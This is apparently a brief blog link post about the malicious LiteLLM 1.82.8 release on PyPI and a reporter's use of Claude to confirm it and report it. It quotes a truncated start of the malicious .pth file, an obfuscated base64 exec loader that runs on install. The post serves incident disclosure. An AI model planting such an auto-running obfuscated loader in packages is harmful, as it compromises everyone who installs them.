My minute-by-minute response to the LiteLLM malware attack (https://futuresearch.ai/blog/litellm-attack-transcript/)

Callum McMahon reported the LiteLLM malware attack (https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:

Confirmed. Fresh download from PyPI right now in an isolated Docker container:

Inspecting: litellm-1.82.8-py3-none-any.whl FOUND: litellm_init.pth SIZE: 34628 bytes FIRST 200 CHARS: import os, subprocess, sys; subprocess.Popen([sys.executable, “-c”, “import base64; exec(base64.b64decode(’aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl…

The malicious litellm==1.82.8 is live on PyPI right now and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.

I was chuffed to see Callum use my claude-code-transcripts (https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation.

Via Hacker News (https://news.ycombinator.com/item?id=47531967)

Tags: pypi (https://simonwillison.net/tags/pypi), security (https://simonwillison.net/tags/security), ai (https://simonwillison.net/tags/ai), generative-ai (https://simonwillison.net/tags/generative-ai), llms (https://simonwillison.net/tags/llms), claude (https://simonwillison.net/tags/claude), supply-chain (https://simonwillison.net/tags/supply-chain)